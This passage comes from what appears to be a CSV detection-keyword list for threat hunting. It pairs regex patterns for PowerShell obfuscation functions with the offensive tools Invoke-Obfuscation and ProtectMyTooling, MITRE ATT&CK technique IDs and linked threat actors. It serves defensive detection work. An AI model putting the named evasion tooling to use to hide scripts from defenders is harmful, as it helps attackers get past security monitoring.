Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54124" "*Out-ObfuscatedDynamicKeywordStatementAst *",".{0,1000}Out\-ObfuscatedDynamicKeywordStatementAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54125" "*Out-ObfuscatedErrorExpressionAst *",".{0,1000}Out\-ObfuscatedErrorExpressionAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54126" "*Out-ObfuscatedErrorExpressionAst *",".{0,1000}Out\-ObfuscatedErrorExpressionAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54127" "*Out-ObfuscatedErrorStatementAst *",".{0,1000}Out\-ObfuscatedErrorStatementAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense 
Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54128" "*Out-ObfuscatedErrorStatementAst *",".{0,1000}Out\-ObfuscatedErrorStatementAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54129" "*Out-ObfuscatedExitStatementAst *",".{0,1000}Out\-ObfuscatedExitStatementAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54130" "*Out-ObfuscatedExitStatementAst *",".{0,1000}Out\-ObfuscatedExitStatementAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54131" "*Out-ObfuscatedExpandableStringExpressionAst *",".{0,1000}Out\-ObfuscatedExpandableStringExpressionAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense 
Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54132" "*Out-ObfuscatedExpandableStringExpressionAst *",".{0,1000}Out\-ObfuscatedExpandableStringExpressionAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54133" "*Out-ObfuscatedExpressionAst *",".{0,1000}Out\-ObfuscatedExpressionAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54134" "*Out-ObfuscatedExpressionAst *",".{0,1000}Out\-ObfuscatedExpressionAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54135" "*Out-ObfuscatedFileRedirectionAst *",".{0,1000}Out\-ObfuscatedFileRedirectionAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense 
Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54136" "*Out-ObfuscatedFileRedirectionAst *",".{0,1000}Out\-ObfuscatedFileRedirectionAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54137" "*Out-ObfuscatedForEachStatementAst *",".{0,1000}Out\-ObfuscatedForEachStatementAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54138" "*Out-ObfuscatedForEachStatementAst *",".{0,1000}Out\-ObfuscatedForEachStatementAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54139" "*Out-ObfuscatedForStatementAst *",".{0,1000}Out\-ObfuscatedForStatementAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense 
Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54140" "*Out-ObfuscatedForStatementAst *",".{0,1000}Out\-ObfuscatedForStatementAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54141" "*Out-ObfuscatedFunctionDefinitionAst *",".{0,1000}Out\-ObfuscatedFunctionDefinitionAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54142" "*Out-ObfuscatedFunctionDefinitionAst *",".{0,1000}Out\-ObfuscatedFunctionDefinitionAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54143" "*Out-ObfuscatedFunctionMemberAst *",".{0,1000}Out\-ObfuscatedFunctionMemberAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense 
Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54144" "*Out-ObfuscatedFunctionMemberAst *",".{0,1000}Out\-ObfuscatedFunctionMemberAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54145" "*Out-ObfuscatedHashtableAst *",".{0,1000}Out\-ObfuscatedHashtableAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54146" "*Out-ObfuscatedHashtableAst *",".{0,1000}Out\-ObfuscatedHashtableAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54147" "*Out-ObfuscatedIfStatementAst *",".{0,1000}Out\-ObfuscatedIfStatementAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54148" 
"*Out-ObfuscatedIfStatementAst *",".{0,1000}Out\-ObfuscatedIfStatementAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54149" "*Out-ObfuscatedIndexExpressionAst *",".{0,1000}Out\-ObfuscatedIndexExpressionAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54150" "*Out-ObfuscatedIndexExpressionAst *",".{0,1000}Out\-ObfuscatedIndexExpressionAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54151" "*Out-ObfuscatedInvokeMemberExpressionAst *",".{0,1000}Out\-ObfuscatedInvokeMemberExpressionAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54152" "*Out-ObfuscatedInvokeMemberExpressionAst 
*",".{0,1000}Out\-ObfuscatedInvokeMemberExpressionAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54153" "*Out-ObfuscatedLabeledStatementAst *",".{0,1000}Out\-ObfuscatedLabeledStatementAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54154" "*Out-ObfuscatedLabeledStatementAst *",".{0,1000}Out\-ObfuscatedLabeledStatementAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54155" "*Out-ObfuscatedLoopStatementAst *",".{0,1000}Out\-ObfuscatedLoopStatementAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54156" "*Out-ObfuscatedLoopStatementAst *",".{0,1000}Out\-ObfuscatedLoopStatementAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper 
letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54157" "*Out-ObfuscatedMemberAst *",".{0,1000}Out\-ObfuscatedMemberAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54158" "*Out-ObfuscatedMemberAst *",".{0,1000}Out\-ObfuscatedMemberAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54159" "*Out-ObfuscatedMemberExpressionAst *",".{0,1000}Out\-ObfuscatedMemberExpressionAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54160" "*Out-ObfuscatedMemberExpressionAst *",".{0,1000}Out\-ObfuscatedMemberExpressionAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource 
Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54161" "*Out-ObfuscatedMergingRedirectionAst *",".{0,1000}Out\-ObfuscatedMergingRedirectionAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54162" "*Out-ObfuscatedMergingRedirectionAst *",".{0,1000}Out\-ObfuscatedMergingRedirectionAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54163" "*Out-ObfuscatedNamedAttributeArgumentAst *",".{0,1000}Out\-ObfuscatedNamedAttributeArgumentAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54164" "*Out-ObfuscatedNamedAttributeArgumentAst *",".{0,1000}Out\-ObfuscatedNamedAttributeArgumentAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource 
Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54165" "*Out-ObfuscatedNamedBlockAst *",".{0,1000}Out\-ObfuscatedNamedBlockAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54166" "*Out-ObfuscatedNamedBlockAst *",".{0,1000}Out\-ObfuscatedNamedBlockAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54167" "*Out-ObfuscatedParamBlockAst *",".{0,1000}Out\-ObfuscatedParamBlockAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54168" "*Out-ObfuscatedParamBlockAst *",".{0,1000}Out\-ObfuscatedParamBlockAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54169" 
"*Out-ObfuscatedParameterAst *",".{0,1000}Out\-ObfuscatedParameterAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54170" "*Out-ObfuscatedParameterAst *",".{0,1000}Out\-ObfuscatedParameterAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54171" "*Out-ObfuscatedParenExpressionAst *",".{0,1000}Out\-ObfuscatedParenExpressionAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54172" "*Out-ObfuscatedParenExpressionAst *",".{0,1000}Out\-ObfuscatedParenExpressionAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54173" "*Out-ObfuscatedPipelineAst *",".{0,1000}Out\-ObfuscatedPipelineAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a 
PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54174" "*Out-ObfuscatedPipelineAst *",".{0,1000}Out\-ObfuscatedPipelineAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54175" "*Out-ObfuscatedPipelineBaseAst *",".{0,1000}Out\-ObfuscatedPipelineBaseAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54176" "*Out-ObfuscatedPipelineBaseAst *",".{0,1000}Out\-ObfuscatedPipelineBaseAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54177" "*Out-ObfuscatedPropertyMemberAst *",".{0,1000}Out\-ObfuscatedPropertyMemberAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - 
Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54178" "*Out-ObfuscatedPropertyMemberAst *",".{0,1000}Out\-ObfuscatedPropertyMemberAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54179" "*Out-ObfuscatedRedirectionAst *",".{0,1000}Out\-ObfuscatedRedirectionAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54180" "*Out-ObfuscatedRedirectionAst *",".{0,1000}Out\-ObfuscatedRedirectionAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54181" "*Out-ObfuscatedReturnStatementAst *",".{0,1000}Out\-ObfuscatedReturnStatementAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense 
Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54182" "*Out-ObfuscatedReturnStatementAst *",".{0,1000}Out\-ObfuscatedReturnStatementAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54183" "*Out-ObfuscatedScriptBlockAst *",".{0,1000}Out\-ObfuscatedScriptBlockAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54184" "*Out-ObfuscatedScriptBlockAst *",".{0,1000}Out\-ObfuscatedScriptBlockAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54185" "*Out-ObfuscatedScriptBlockExpressionAst *",".{0,1000}Out\-ObfuscatedScriptBlockExpressionAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense 
